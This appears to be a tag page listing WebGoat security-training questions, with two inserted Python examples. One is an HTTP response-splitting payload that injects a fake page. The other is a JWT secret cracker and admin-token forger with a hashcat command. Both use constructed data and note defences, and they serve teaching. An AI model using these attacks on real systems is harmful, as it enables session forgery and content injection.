Questions tagged [webgoat]

WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons.

13 questions
5 votes, 1 answer

OWASP WebGoat Warning Meaning

I am just starting with WebGoat. On their GitHub page [https://github.com/WebGoat/WebGoat], they have this warning posted: WARNING 1: While running this program your machine will be extremely vulnerable to attack. You should disconnect from the…
devautor • 153 • 5
5 votes, 3 answers

Do WebGoat style XSS attacks still work?

I am going through the WebGoat exercises, to refresh my knowledge of XSS attacks. Specifically, I am doing the Stage 1 XSS exercise. This exercise has a form that deliberately does not sanitize input. The solution video shows using the JavaScript…
Sonny Ordell • 3,476 • 9 • 33 • 56
5 votes, 4 answers

Why is this response splitting attack not working?

I'm working through OWASP's "WebGoat" (version 5.4) vulnerable web application, but I'm getting stuck on one of the earliest lessons which is to do with HTTP response splitting. I've looked in all the hints and the solution (and even at all the…
Grezzo • 632 • 1 • 6 • 12
3 votes, 1 answer

Webgoat missing function level access control lesson

I've recently installed WebGoat 8.00M12 on my computer and I tried to solve the "Access Control" section for a demonstration in my class. Everything was simple and smooth till I got stuck at the last point in "Missing function level access control…
Jamil Hneini • 133 • 5
2 votes, 1 answer

Is there a difference between editing HTTP messages manually or with burp for example? (WebGoat HTTP intercept exercise "problem")

I am now diving into WebGoat. There's this little exercise in the "General" tab called "HTTP Proxies" which asks you to use ZAP/Burp to intercept and modify a request; this is what we are being asked. I understood what we are being asked to do, but…
Iván • 23 • 3
2 votes, 2 answers

CSRF methods: img vs iframe vs form/javascript

I have a question concerning methods for executing CSRF. I did the CSRF Prompt By-pass lesson in WebGoat (Lessons -> Cross-site Scripting -> CSRF Prompt By-pass). The lesson requires you to craft an email message that sends two malicious requests…
hubbabubba • 121 • 3
2 votes, 0 answers

ZAP and Tamper Data are not getting any POST requests

I just started learning the OWASP ZAP proxy using WebGoat. I am running these on my Mac. I have configured ZAP to listen to my Firefox, but I'm only able to send HTTP GET requests; there are no POST requests showing up. I also tried to use the…
Z.Zhe • 29 • 2
1 vote, 1 answer

What is happening to second response in HTTP Splitting?

Doing the WebGoat HTTP splitting exercise. I feel like I'm doing something wrong or there is something that I don't understand. The idea is that since we can control the referer parameter, we can split the request into 2 and have the server send us…
4d4143 • 133 • 1 • 8
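The two HTTP splitting questions above ("Why is this response splitting attack not working?" and this one) both turn on the same mechanism, so here is one added example that models it end to end. It is not code from either question or from WebGoat: a server copies a user-controlled value into a response header without stripping carriage return and line feed, so a value containing CR LF terminates the first response early and smuggles in a second, fully attacker-controlled response that the client (or a cache) reads as the reply to the next request. The header name (Location) and parameter name (language) are assumptions for illustration, and the attacker value is constructed here.

```python
"""
Added example (not from the original questions or from WebGoat): a
self-contained model of HTTP response splitting. The naive builder is
deliberately vulnerable, as the WebGoat lesson is; the safe builder shows
the fix. The Location header and 'language' parameter are assumed names.
"""

import re


def build_redirect_naive(language: str) -> bytes:
    """Vulnerable on purpose: the user-controlled value is interpolated verbatim."""
    headers = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: /lang/{language}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return headers.encode("latin-1")


CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def build_redirect_safe(language: str) -> bytes:
    """Hardened: refuse any control character (CR, LF, NUL, ...) in a header value.
    Modern servlet containers and frameworks do this for you; the lesson does not."""
    if CONTROL_CHARS.search(language):
        raise ValueError("control character in header value")
    return build_redirect_naive(language)


def safe_rejects(language: str) -> bool:
    """True when the hardened builder refuses the value."""
    try:
        build_redirect_safe(language)
    except ValueError:
        return True
    return False


def split_responses(stream: bytes) -> list:
    """Parse a byte stream the way a simple HTTP/1.1 client or cache does:
    status line, headers, CRLF CRLF, then exactly Content-Length body bytes.
    Whatever follows is read as the *next* response on the same connection."""
    responses = []
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        status = lines[0]
        if not status.startswith("HTTP/"):
            break  # trailing junk left over from the real server, not a response
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        responses.append({
            "status": status,
            "headers": headers,
            "body": stream[body_start:body_start + length],
        })
        pos = body_start + length
    return responses


# Constructed attacker value: finishes the 302's headers, then supplies a
# complete second response. Giving that response its own Content-Length makes
# the client stop exactly at the end of the fake body, so the server's
# trailing "Content-Length: 0" header is discarded as junk instead of parsed.
FAKE_BODY = "<html>Hacked Page</html>"
SPLIT_PAYLOAD = (
    "en\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    f"Content-Length: {len(FAKE_BODY)}\r\n"
    "\r\n"
    f"{FAKE_BODY}"
)


def responses_seen(language: str) -> int:
    """How many responses a client sees on the wire for the naive builder."""
    return len(split_responses(build_redirect_naive(language)))


if __name__ == "__main__":
    for r in split_responses(build_redirect_naive(SPLIT_PAYLOAD)):
        print(r["status"], r["headers"], r["body"])
    print("hardened builder rejects payload:", safe_rejects(SPLIT_PAYLOAD))
```

The usual reason a splitting payload "does not work" is the parsing side, not the injection: the CR LF must survive URL decoding (send `%0d%0a`, not literal newlines), the second response needs an accurate `Content-Length`, and a browser that already follows the 302 will show the redirect target rather than the smuggled page, so watch the raw bytes in the proxy rather than the rendered window.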
1 vote, 1 answer

WebGoat 8: JWT Tokens Lesson 5 using hashcat to crack signature

I cracked the hash, and I got…
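What the hashcat run in this question is doing, as an added example that is not code from the question, from hashcat or from WebGoat: an HS256 JWT's signature is HMAC-SHA256 over `base64url(header) "." base64url(payload)`, so a captured token can be attacked offline by computing one HMAC per candidate secret and comparing. The token, the weak secret ("shipping"), the claims and the wordlist below are all constructed for this example; once the secret is known the token can be re-signed with edited claims.

```python
"""
Added example (not from the question, hashcat or WebGoat): offline
dictionary attack on an HS256 JWT, then re-signing with edited claims.
All sample data below is constructed.
"""

import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a compact JWS the way a server-side JWT library does."""
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the signature verifies, otherwise None."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate secret. The signing input is fixed, so each guess
    costs exactly one HMAC; hashcat mode 16500 does the same, massively faster."""
    head, body, sig = token.split(".")
    signing_input = f"{head}.{body}".encode("ascii")
    target = b64url_decode(sig)
    for word in wordlist:
        guess = hmac.new(word.encode("utf-8"), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return word
    return None


def forge(token: str, secret: str, **changes) -> str:
    """Edit claims and re-sign with the recovered secret (keeps the original header)."""
    head, body, _ = token.split(".")
    header = json.loads(b64url_decode(head))
    payload = json.loads(b64url_decode(body))
    payload.update(changes)
    return sign_hs256(header, payload, secret.encode("utf-8"))


# Constructed sample: weak secret, a non-admin user, and a tiny wordlist.
WEAK_SECRET = "shipping"
SAMPLE_TOKEN = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"user": "Jerry", "admin": "false"},
    WEAK_SECRET.encode("utf-8"),
)
WORDLIST = ["password", "secret", "letmein", "webgoat", "shipping", "admin"]


if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", found)
    if found:
        forged = forge(SAMPLE_TOKEN, found, admin="true")
        print("forged token verifies as:", verify_hs256(forged, found.encode()))
```

With hashcat the equivalent is `hashcat -m 16500 token.txt wordlist.txt`, where the file holds the raw `header.payload.signature` string; the recovered secret is then used exactly as `forge` does above. The defence is the mirror image: a long random HMAC key (or an asymmetric algorithm), and a server that pins the accepted `alg` rather than trusting the header.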
1 vote, 0 answers

Can anyone provide a hint for Webgoat 8's Deserialization exercise?

Working on the Deserialization exercise in WebGoat (v. 8). The Burp extension "Java Deserialization Scanner" detects that this page is potentially vulnerable to the Hibernate 5 (sleep) payload. However, the payload used in the scanner does not…
mcgyver5 • 6,807 • 2 • 24 • 45
1 vote, 2 answers

How can I intercept localhost traffic to/from WebGoat with ZED attack proxy?

For context, I recently started working through the WebGoat appsec training program, and have hit a wall passing data to a program needed to complete a lesson. One of the first lesson sets is entitled "Access Control Flaws". The first lesson…
Greg • 11 • 3
0 votes, 1 answer

Unable to proxy Webgoat localhost requests in spite of doing the necessary configurations

I am new to WebGoat and followed all the steps required to configure Firefox and WebGoat: (1) set up local proxies in WebGoat to run on localhost 8090, (2) exported the certificate and imported it in Firefox, (3) set up the proxy in Firefox and removed…
-1 votes, 1 answer

WebGoat on a separate computer?

I was wondering if it's possible to have WebGoat on one computer and access it from another computer running Kali Linux. Detailed instructions would be very much appreciated.